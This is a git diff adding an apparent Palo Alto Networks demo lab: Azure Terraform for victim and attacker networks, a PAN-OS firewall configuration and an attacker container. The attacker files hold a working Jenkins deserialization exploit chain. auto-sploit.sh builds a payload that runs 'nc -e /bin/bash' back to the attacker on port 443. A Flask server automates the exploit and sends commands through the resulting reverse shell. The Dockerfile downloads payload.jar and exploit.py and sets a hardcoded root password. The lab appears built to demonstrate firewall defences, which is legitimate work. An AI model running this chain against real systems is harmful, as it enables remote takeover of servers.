+  subnet_id      = "${azurerm_subnet.webservers.id}"
+  route_table_id = "${azurerm_route_table.webservers.id}"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker.sh
new file mode 100644
index 00000000..032feb65
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo "  attacker:" >> docker-compose.yml
+echo "    image: pglynn/kali:latest" >> docker-compose.yml
+echo "    ports:" >> docker-compose.yml
+echo "      - \"443:443\"" >> docker-compose.yml
+echo "      - \"5000:5000\"" >> docker-compose.yml
+docker-compose up -d
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker1.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker1.sh
new file mode 100644
index 00000000..4cabd5ed
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker1.sh
@@ -0,0 +1,13 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/Dockerfile
+wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/docker-compose.yml
+wget https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/attacker/run.sh
+wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/auto-sploit.sh
+wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/exp-server.py
+docker-compose build
+docker-compose up -d
diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver.sh
new file mode 100644
index 00000000..bb37c3e5
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+echo "version: '3'" > docker-compose.yml
+echo "services:" >> docker-compose.yml
+echo "  jenkins:" >> docker-compose.yml
+echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
+echo "    environment:" >> docker-compose.yml
+echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
+echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
+echo "    ports:" >> docker-compose.yml
+echo "      - \"50000:50000\"" >> docker-compose.yml
+echo "      - \"8080:8080\"" >> docker-compose.yml
+docker-compose up -d
diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver1.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver1.sh
new file mode 100644
index 00000000..17b352c5
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver1.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+apt-get update
+apt-get update
+apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
+pip3 install docker-compose
+cd /var/tmp
+wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile
+wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml
+wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh
+docker-compose build
+docker-compose up -d
diff --git a/azure/Jenkins_proj-working/WebInDeploy/terraform.tfvars b/azure/Jenkins_proj-working/WebInDeploy/terraform.tfvars
new file mode 100644
index 00000000..f56aa41c
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/terraform.tfvars
@@ -0,0 +1,47 @@
+Attack_RG_Name = "<Attacker RG Name>"
+
+Azure_Region = "<Azure Region>"
+
+Admin_Username = "<Admin Username>"
+
+Admin_Password = "<Admin Password>"
+
+Bootstrap_Storage_Account = "<Bootstrap Storage Account>"
+
+Storage_Account_Access_Key = "<Storage Account Access Key>"
+
+Storage_Account_Fileshare = "<Storage Account Fileshare Name>"
+
+Storage_Account_Fileshare_Directory = "None" 
+
+Web_Initscript_Path = "/scripts/initialize_webserver.sh"
+
+Attack_Initscript_Path = "/scripts/initialize_attacker.sh"
+
+Victim_CIDR = "10.0.0.0/16"
+
+Attack_CIDR = "10.1.0.0/16"
+
+Mgmt_Subnet_CIDR = "10.0.0.0/24"
+
+Untrust_Subnet_CIDR = "10.0.1.0/24"
+
+Trust_Subnet_CIDR = "10.0.2.0/24"
+
+AppGW_Subnet_CIDR = "10.0.3.0/24"
+
+Web_Subnet_CIDR = "10.0.4.0/24"
+
+Attack_Subnet_CIDR = "10.1.1.0/24"
+
+FW_Mgmt_IP = "10.0.0.10"
+
+FW_Untrust_IP = "10.0.1.10"
+
+FW_Trust_IP = "10.0.2.10"
+
+WebLB_IP = "10.0.4.10"
+
+Web_IP = "10.0.4.50"
+
+Attack_IP = "10.1.1.50"
diff --git a/azure/Jenkins_proj-working/WebInDeploy/vnet-subnets.tf b/azure/Jenkins_proj-working/WebInDeploy/vnet-subnets.tf
new file mode 100644
index 00000000..12c64ba4
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/vnet-subnets.tf
@@ -0,0 +1,53 @@
+# Configure the Microsoft Azure Provider
+provider "azurerm" {}
+
+data "azurerm_resource_group" "resourcegroup" {
+  name = "${var.RG_Name}"
+}
+
+# ********** VNET **********
+
+# Create a virtual network in the resource group
+resource "azurerm_virtual_network" "vnet" {
+  name				= "vnet-fw"
+  address_space		= ["${var.Victim_CIDR}"]
+  location		= "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name	= "${data.azurerm_resource_group.resourcegroup.name}"
+}
+
+#### CREATE THE SUBNETS ####
+
+resource "azurerm_subnet" "management" {
+  name                 = "management"
+  resource_group_name  = "${data.azurerm_resource_group.resourcegroup.name}"
+  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+  address_prefix       = "${var.Mgmt_Subnet_CIDR}"
+}
+
+resource "azurerm_subnet" "untrust" {
+  name                 = "untrust"
+  resource_group_name  = "${data.azurerm_resource_group.resourcegroup.name}"
+  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+  address_prefix       = "${var.Untrust_Subnet_CIDR}"
+}
+
+resource "azurerm_subnet" "trust" {
+  name                 = "trust"
+  resource_group_name  = "${data.azurerm_resource_group.resourcegroup.name}"
+  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+  address_prefix       = "${var.Trust_Subnet_CIDR}"
+}
+
+resource "azurerm_subnet" "loadbalancers" {
+  name                 = "loadbalancers"
+  resource_group_name  = "${data.azurerm_resource_group.resourcegroup.name}"
+  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+  address_prefix       = "${var.AppGW_Subnet_CIDR}"
+}
+
+resource "azurerm_subnet" "webservers" {
+  name                 = "webservers"
+  resource_group_name  = "${data.azurerm_resource_group.resourcegroup.name}"
+  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+  address_prefix       = "${var.Web_Subnet_CIDR}"
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInDeploy/webservers.tf b/azure/Jenkins_proj-working/WebInDeploy/webservers.tf
new file mode 100644
index 00000000..5cfab277
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInDeploy/webservers.tf
@@ -0,0 +1,46 @@
+data "template_file" "cloudconfig" {
+  
+  template = "${file("${path.root}${var.Web_Initscript_Path}")}"
+}
+data "template_cloudinit_config" "config" {
+  gzip          = true
+  base64_encode = true
+
+  part {
+    content = "${data.template_file.cloudconfig.rendered}"
+  }
+}
+
+resource "azurerm_virtual_machine" "webserver" {
+  name                  = "webserver"
+  location              = "${data.azurerm_resource_group.resourcegroup.location}"
+  resource_group_name   = "${data.azurerm_resource_group.resourcegroup.name}"
+  vm_size               = "Standard_A3"
+
+  storage_image_reference {
+    publisher = "Canonical"
+    offer     = "UbuntuServer"
+    sku       = "16.04-LTS"
+    version   = "latest"
+  }
+
+  storage_os_disk {
+    name              = "web-disk"
+    caching           = "ReadWrite"
+    create_option     = "FromImage"
+    managed_disk_type = "Standard_LRS"
+  }
+
+  os_profile {
+    computer_name  = "webserver"
+    admin_username = "${var.Admin_Username}"
+    admin_password = "${var.Admin_Password}"
+    custom_data    = "${data.template_cloudinit_config.config.rendered}"
+  }
+
+  network_interface_ids = ["${azurerm_network_interface.web1.id}"]
+
+  os_profile_linux_config {
+    disable_password_authentication = false
+  }
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInFWConf/azure_vars.tf b/azure/Jenkins_proj-working/WebInFWConf/azure_vars.tf
new file mode 100644
index 00000000..844625d6
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInFWConf/azure_vars.tf
@@ -0,0 +1,10 @@
+
+variable "FW_Mgmt_IP" {}
+variable "FW_Untrust_IP" {}
+variable "Web_IP" {}
+variable "LB_IP" {}
+variable "Admin_Username" {}
+variable "Admin_Password" {}
+variable "FW_Default_GW" {}
+variable "FW_Internal_GW" {}
+variable "Web_Subnet_CIDR" {}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/WebInFWConf/firewallconfig.tf b/azure/Jenkins_proj-working/WebInFWConf/firewallconfig.tf
new file mode 100644
index 00000000..da110808
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInFWConf/firewallconfig.tf
@@ -0,0 +1,209 @@
+provider "panos" {
+  hostname = "${var.FW_Mgmt_IP}"
+  username = "${var.Admin_Username}"
+  password = "${var.Admin_Password}"
+}
+
+resource "panos_management_profile" "imp_allow_ping" {
+  name = "Allow ping"
+  ping = true
+}
+
+resource "panos_ethernet_interface" "eth1_1" {
+  name                      = "ethernet1/1"
+  vsys                      = "vsys1"
+  mode                      = "layer3"
+  comment                   = "External interface"
+  enable_dhcp               = true
+
+  management_profile = "${panos_management_profile.imp_allow_ping.name}"
+}
+
+resource "panos_ethernet_interface" "eth1_2" {
+  name        = "ethernet1/2"
+  vsys        = "vsys1"
+  mode        = "layer3"
+  comment     = "Web interface"
+  enable_dhcp = true
+}
+
+resource "panos_zone" "zone_untrust" {
+  name       = "UNTRUST"
+  mode       = "layer3"
+  interfaces = ["${panos_ethernet_interface.eth1_1.name}"]
+}
+
+resource "panos_zone" "zone_trust" {
+  name       = "TRUST"
+  mode       = "layer3"
+  interfaces = ["${panos_ethernet_interface.eth1_2.name}"]
+}
+
+resource "panos_service_object" "so_22" {
+  name             = "service-tcp-22"
+  protocol         = "tcp"
+  destination_port = "22"
+}
+
+resource "panos_service_object" "so_221" {
+  name             = "service-tcp-221"
+  protocol         = "tcp"
+  destination_port = "221"
+}
+
+resource "panos_service_object" "so_222" {
+  name             = "service-tcp-222"
+  protocol         = "tcp"
+  destination_port = "222"
+}
+
+resource "panos_service_object" "so_81" {
+  name             = "service-http-81"
+  protocol         = "tcp"
+  destination_port = "81"
+}
+
+resource "panos_address_object" "intLB" {
+  name        = "Azure-Int-LB"
+  value       = "${var.LB_IP}"
+  description = "Azure Int LB Address"
+}
+
+resource "panos_security_policies" "security_policies" {
+  rule {
+    name                  = "SSH inbound"
+    source_zones          = ["${panos_zone.zone_untrust.name}"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["${panos_zone.zone_trust.name}"]
+    destination_addresses = ["any"]
+    applications          = ["ssh", "ping"]
+    services              = ["application-default"]
+    categories            = ["any"]
+    action                = "allow"
+  }
+
+  rule {
+    name                  = "SSH 221-222 inbound"
+    source_zones          = ["${panos_zone.zone_untrust.name}"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["${panos_zone.zone_trust.name}"]
+    destination_addresses = ["any"]
+    applications          = ["ssh", "ping"]
+    services              = ["${panos_service_object.so_221.name}", "${panos_service_object.so_222.name}"]
+    categories            = ["any"]
+    action                = "allow"
+  }
+
+  rule {
+    name                  = "Allow all ping"
+    source_zones          = ["any"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["any"]
+    destination_addresses = ["any"]
+    applications          = ["ping"]
+    services              = ["application-default"]
+    categories            = ["any"]
+    action                = "allow"
+  }
+
+  rule {
+    name                  = "Permit Health Checks"
+    source_zones          = ["${panos_zone.zone_untrust.name}"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["${panos_zone.zone_trust.name}"]
+    destination_addresses = ["any"]
+    applications          = ["elb-healthchecker"]
+    services              = ["application-default"]
+    categories            = ["any"]
+    action                = "allow"
+  }
+
+  rule {
+    name                  = "Web browsing"
+    source_zones          = ["${panos_zone.zone_untrust.name}"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"]
+    destination_addresses = ["any"]
+    applications          = ["web-browsing", "jenkins", "windows-azure-base"]
+    services              = ["service-http", "${panos_service_object.so_81.name}"]
+    categories            = ["any"]
+    group                 = "Inbound"
+    action                = "allow"
+  }
+
+  rule {
+    name                  = "Allow all outbound"
+    source_zones          = ["${panos_zone.zone_trust.name}"]
+    source_addresses      = ["any"]
+    source_users          = ["any"]
+    hip_profiles          = ["any"]
+    destination_zones     = ["${panos_zone.zone_untrust.name}"]
+    destination_addresses = ["any"]
+    applications          = ["any"]
+    services              = ["application-default"]
+    categories            = ["any"]
+    group                 = "Outbound"
+    action                = "allow"
+  }
+}
+
+resource "panos_nat_policy" "nat1" {
+  name                  = "Web1 SSH"
+  source_zones          = ["${panos_zone.zone_untrust.name}"]
+  destination_zone      = "${panos_zone.zone_untrust.name}"
+  service               = "${panos_service_object.so_221.name}"
+  source_addresses      = ["any"]
+  destination_addresses = ["${var.FW_Untrust_IP}"]
+  sat_type              = "dynamic-ip-and-port"
+  sat_address_type      = "interface-address"
+  sat_interface         = "${panos_ethernet_interface.eth1_2.name}"
+  dat_type              = "static"
+  dat_address           = "${var.Web_IP}"
+  dat_port              = "22"
+}
+
+resource "panos_nat_policy" "nat3" {
+  name                  = "Webserver NAT"
+  source_zones          = ["${panos_zone.zone_untrust.name}"]
+  destination_zone      = "${panos_zone.zone_untrust.name}"
+  service               = "service-http"
+  source_addresses      = ["any"]
+  destination_addresses = ["${var.FW_Untrust_IP}"]
+  sat_type              = "dynamic-ip-and-port"
+  sat_address_type      = "interface-address"
+  sat_interface         = "${panos_ethernet_interface.eth1_2.name}"
+  dat_type              = "dynamic"
+  dat_address           = "Azure-Int-LB"
+  dat_port              = "8080"
+}
+
+resource "panos_virtual_router" "vr1" {
+  name       = "default"
+  interfaces = ["${panos_ethernet_interface.eth1_1.name}", "${panos_ethernet_interface.eth1_2.name}"]
+}
+
+resource "panos_static_route_ipv4" "default" {
+    name = "default"
+    virtual_router = "${panos_virtual_router.vr1.name}"
+    interface = "${panos_ethernet_interface.eth1_1.name}"
+    destination = "0.0.0.0/0"
+    next_hop = "${var.FW_Default_GW}"
+}
+
+resource "panos_static_route_ipv4" "internal" {
+    name = "internal"
+    virtual_router = "${panos_virtual_router.vr1.name}"
+    interface = "${panos_ethernet_interface.eth1_2.name}"
+    destination = "${var.Web_Subnet_CIDR}"
+    next_hop = "${var.FW_Internal_GW}"
+}
diff --git a/azure/Jenkins_proj-working/WebInFWConf/terraform.tfvars b/azure/Jenkins_proj-working/WebInFWConf/terraform.tfvars
new file mode 100644
index 00000000..e35d4a52
--- /dev/null
+++ b/azure/Jenkins_proj-working/WebInFWConf/terraform.tfvars
@@ -0,0 +1,15 @@
+Admin_Username = "<Admin Username>"
+
+Admin_Password = "<Admin Password>"
+
+FW_Untrust_IP = "10.0.1.10"
+
+LB_IP = "10.0.4.10"
+
+Web_IP = "10.0.4.50"
+
+FW_Default_GW = "10.0.1.1"
+
+Web_Subnet_CIDR = "10.0.4.0/24"
+
+FW_Internal_GW = "10.0.2.1"
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/attacker/Dockerfile b/azure/Jenkins_proj-working/attacker/Dockerfile
new file mode 100644
index 00000000..e6123ab4
--- /dev/null
+++ b/azure/Jenkins_proj-working/attacker/Dockerfile
@@ -0,0 +1,42 @@
+FROM openjdk:8-jdk
+
+MAINTAINER jamie-b
+
+RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo python3 python3-pip && rm -rf /var/lib/apt/lists/*
+
+RUN echo 'root:paloalto' | chpasswd
+
+ENV TINI_VERSION v0.14.0
+ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini
+RUN chmod +x /bin/tini
+
+RUN set -ex \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar -O ~/commons-beanutils-1.8.3.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar -O ~/commons-collections-3.2.1.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar -O ~/commons-lang-2.6.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar -O ~/commons-logging-1.2.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar -O ~/ezmorph-1.0.6.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar -O ~/json-lib-2.4-jenkins-2.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/payload.jar -O ~/payload.jar -q --progress=bar:force:noscroll --show-progress \
+    && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/exploit.py -O ~/exploit.py -q --progress=bar:force:noscroll --show-progress
+
+EXPOSE 443 5000
+
+RUN pip3 install requests flask pexpect
+
+COPY run.sh /usr/local/bin/run.sh
+COPY exp-server.py /root/exp-server.py
+
+RUN chmod +x /usr/local/bin/run.sh
+
+COPY auto-sploit.sh /root/auto-sploit.sh
+
+RUN chmod +x /root/auto-sploit.sh
+
+USER root
+
+ENTRYPOINT ["/bin/tini", "--"]
+ENV FLASK_APP=/root/exp-server.py
+
+# CMD ["/usr/local/bin/run.sh"]
+CMD ["/usr/local/bin/flask", "run", "--host=0.0.0.0"]
diff --git a/azure/Jenkins_proj-working/attacker/auto-sploit.sh b/azure/Jenkins_proj-working/attacker/auto-sploit.sh
new file mode 100644
index 00000000..97c6dc3d
--- /dev/null
+++ b/azure/Jenkins_proj-working/attacker/auto-sploit.sh
@@ -0,0 +1,31 @@
+#! /bin/bash 
+
+echo
+echo "*******************************************************************"
+echo
+echo "Open another terminal window and run a netcat listener: nc -lvp 443"
+echo
+echo "Run the following command  to spawn a shell once the reverse connection establishes:"
+echo 
+echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'" 
+echo
+read -n 1 -s -r -p "Once the above is complete - press any key to continue"
+
+echo
+echo "Enter Attacker IP Address:"
+echo
+
+read attacker
+
+echo "Creating Payload with IP address" $attacker
+echo
+
+java -jar payload.jar payload.ser "nc -e /bin/bash $attacker 443" 
+
+echo "Payload successfully created and saved as 'payload.ser'"
+echo 
+
+echo "Executing exploit..."
+echo
+
+python3 exploit.py
diff --git a/azure/Jenkins_proj-working/attacker/docker-compose.yml b/azure/Jenkins_proj-working/attacker/docker-compose.yml
new file mode 100644
index 00000000..02cdb71b
--- /dev/null
+++ b/azure/Jenkins_proj-working/attacker/docker-compose.yml
@@ -0,0 +1,8 @@
+version: '3'
+services:
+  attacker:
+    build: .
+    container_name: attacker
+    ports:
+      - "443:443"
+      - "5000:5000"
diff --git a/azure/Jenkins_proj-working/attacker/exp-server.py b/azure/Jenkins_proj-working/attacker/exp-server.py
new file mode 100644
index 00000000..19a4a77b
--- /dev/null
+++ b/azure/Jenkins_proj-working/attacker/exp-server.py
@@ -0,0 +1,175 @@
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+"""
+Palo Alto Networks - demo-launcher
+Super simple App to expose a RESTful API to launch a couple of scripts
+This software is provided without support, warranty, or guarantee.
+Use at your own risk.
+"""
+
+import pexpect
+from flask import Flask
+from flask import request
+import os
+import time
+
+app = Flask(__name__)
+
+
+@app.route("/")
+def hello():
+    return "Good Day!"
+
+
+@app.route("/launch", methods=['POST'])
+def launch_sploit():
+    """
+    Accepts a JSON payload with the following structure:
+    {
+        "target": "nlb-something.fqdn.com",
+        "attacker": "1.2.3.4"
+    }
+    If the payload parses correctly, then launch a reverse shell listener using pexpect.spawn
+    then spawn the auto-sploit.sh tool and enter the target and attacker info again using pexpect
+    :return: Simple String response for now
+    """
+    if request.is_json:
+        print(request.data)
+        payload = request.get_json()
+        print(request.mimetype)
+        print(request.content_type)
+        print(request.accept_mimetypes)
+        print(payload)
+        print(type(payload))
+        target_ip = payload.get('target', '')
+        attacker_ip = payload.get('attacker', '')
+        if target_ip == "" or attacker_ip == "":
+            print('Payload is all wrong!')
+            print(request.payload)
+            return 'ERROR'
+
+        exe = '/root/auto-sploit.sh'
+        if not os.path.exists(exe):
+            return 500, 'launch script does not exist'
+
+        print('Launching auto-sploit.sh')
+        child = pexpect.spawn('/root/auto-sploit.sh')
+        child.delaybeforesend = 2
+        found_index = child.expect(['press any key to continue', pexpect.EOF, pexpect.TIMEOUT])
+        if found_index == 0:
+            print('launching listener process')
+            _launch_listener()
+            child.send('\n')
+        else:
+            return 'ERROR - Could not press key to continue'
+
+        found_index = child.expect(['Enter Attacker IP Address', pexpect.EOF, pexpect.TIMEOUT])
+        if found_index == 0:
+            print('Sending attacker ip :::' + attacker_ip + ':::')
+            child.sendline(attacker_ip)
+        else:
+            return 'ERROR - Could not enter attacker IP'
+
+        found_index = child.expect(['Enter Jenkins Target IP Address', pexpect.EOF, pexpect.TIMEOUT])
+        if found_index == 0:
+            print(child.before)
+            print('Sending target ip')
+            child.sendline(target_ip)
+        else:
+            print(child.before)
+            return 'ERROR - Could not enter jenkins IP'
+
+        found_index = child.expect(['pwn', pexpect.EOF, pexpect.TIMEOUT])
+        if found_index == 0:
+            print('PWN')
+            print(child)
+            time.sleep(2)
+            return 'SUCCESS - auto-sploit launched!'
+
+    else:
+        return 'No Bueno - No JSON payload detected'
+
+
+@app.route("/send", methods=['POST'])
+def send_cmd():
+    if request.is_json:
+        data = request.get_json()
+        cli = data.get('cli', '')
+        if cli == '':
+            return 'No Bueno - Invalid JSON payload'
+
+        if 'listener' in app.config:
+            print('We have a listener already up!')
+            listener = app.config.get('listener', '')
+            if not hasattr(listener, 'isalive') or not listener.isalive():
+                return 'No Bueno - Listener does not appear to be active'
+
+            print('Sending initial command to see where we are!')
+            listener.sendline('echo $SHLVL\n')
+            found_index = listener.expect(['1', 'jenkins@', 'root@', pexpect.EOF, pexpect.TIMEOUT])
+            print(found_index)
+            if found_index == 0:
+                # no prompt yet
+                print('Great, trying to get a prompt now')
+                listener.sendline("python -c 'import pty; pty.spawn(\"/bin/bash\")'")
+
+            if found_index > 2:
+                print(listener.before)
+                return 'Someting is wrong with the listener connection!'
+
+            # listener.sendline(cli)
+            # print(listener)
+            found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT])
+            print('Found index is now: ' + str(found_index))
+            if found_index > 1:
+                print(listener)
+                return 'Someting is wrong with the listener connection!'
+            listener.sendline(cli)
+            found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT])
+            print('Found index after cli is now: ' + str(found_index))
+            if found_index > 1:
+                print(listener)
+                return 'Someting is wrong with the listener connection!'
+            print(listener)
+            return listener.before
+
+        else:
+            return 'NOPE'
+    else:
+        return 'NOWAYJOSE'
+
+
+def _launch_listener():
+    if 'listener' not in app.config:
+        listener = pexpect.spawn('nc -lvp 443')
+        found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT])
+        if found_index != 0:
+            return False
+        app.config['listener'] = listener
+        print('Launched and ready to rock')
+        return True
+    else:
+        listener = app.config['listener']
+        if hasattr(listener, 'isalive') and listener.isalive():
+            return True
+        else:
+            listener = pexpect.spawn('nc -lvp 443')
+            found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT])
+            if found_index != 0:
+                return False
+            app.config['listener'] = listener
+            return True
+
+
diff --git a/azure/Jenkins_proj-working/attacker/run.sh b/azure/Jenkins_proj-working/attacker/run.sh
new file mode 100644
index 00000000..bc9b9de7
--- /dev/null
+++ b/azure/Jenkins_proj-working/attacker/run.sh
@@ -0,0 +1,11 @@
+#! /bin/bash -e
+
+# Running nc on an unexposed port to keep the container up
+
+if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
+
+  exec nc -l -p 56789 "$@"
+
+fi
+
+exec "$@"
diff --git a/azure/Jenkins_proj-working/azure_login.py b/azure/Jenkins_proj-working/azure_login.py
new file mode 100644
index 00000000..bbe85a41
--- /dev/null
+++ b/azure/Jenkins_proj-working/azure_login.py
@@ -0,0 +1,10 @@
+from azure import cli
+from azure.cli.core import get_default_cli
+import sys
+
+sys.sterr = sys.stdout
+
+print('Logging in to Azure using device code')
+
+get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
+pass
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/deploy-v2.html b/azure/Jenkins_proj-working/deploy-v2.html
new file mode 100644
index 00000000..123a542a
--- /dev/null
+++ b/azure/Jenkins_proj-working/deploy-v2.html
@@ -0,0 +1,185 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
+<html><head><title>Python: module deploy-v2</title>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+</head><body bgcolor="#f0f0f8">
+
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="heading">
+<tr bgcolor="#7799ee">
+<td valign=bottom>&nbsp;<br>
+<font color="#ffffff" face="helvetica, arial">&nbsp;<br><big><big><strong>deploy-v2</strong></big></big></font></td
+><td align=right valign=bottom
+><font color="#ffffff" face="helvetica, arial"><a href=".">index</a><br><a href="file:/Users/jharris/Documents/PycharmProjects/terraform/azure/Jenkins_proj-master/deploy-v2.py">/Users/jharris/Documents/PycharmProjects/terraform/azure/Jenkins_proj-master/deploy-v2.py</a></font></td></tr></table>
+    <p><tt>#&nbsp;Copyright&nbsp;(c)&nbsp;2018,&nbsp;Palo&nbsp;Alto&nbsp;Networks<br>
+#<br>
+#&nbsp;Permission&nbsp;to&nbsp;use,&nbsp;copy,&nbsp;modify,&nbsp;and/or&nbsp;distribute&nbsp;this&nbsp;software&nbsp;for&nbsp;any<br>
+#&nbsp;purpose&nbsp;with&nbsp;or&nbsp;without&nbsp;fee&nbsp;is&nbsp;hereby&nbsp;granted,&nbsp;provided&nbsp;that&nbsp;the&nbsp;above<br>
+#&nbsp;copyright&nbsp;notice&nbsp;and&nbsp;this&nbsp;permission&nbsp;notice&nbsp;appear&nbsp;in&nbsp;all&nbsp;copies.<br>
+#<br>
+#&nbsp;THE&nbsp;SOFTWARE&nbsp;IS&nbsp;PROVIDED&nbsp;"AS&nbsp;IS"&nbsp;AND&nbsp;THE&nbsp;AUTHOR&nbsp;DISCLAIMS&nbsp;ALL&nbsp;WARRANTIES<br>
+#&nbsp;WITH&nbsp;REGARD&nbsp;TO&nbsp;THIS&nbsp;SOFTWARE&nbsp;INCLUDING&nbsp;ALL&nbsp;IMPLIED&nbsp;WARRANTIES&nbsp;OF<br>
+#&nbsp;MERCHANTABILITY&nbsp;AND&nbsp;FITNESS.&nbsp;IN&nbsp;NO&nbsp;EVENT&nbsp;SHALL&nbsp;THE&nbsp;AUTHOR&nbsp;BE&nbsp;LIABLE&nbsp;FOR<br>
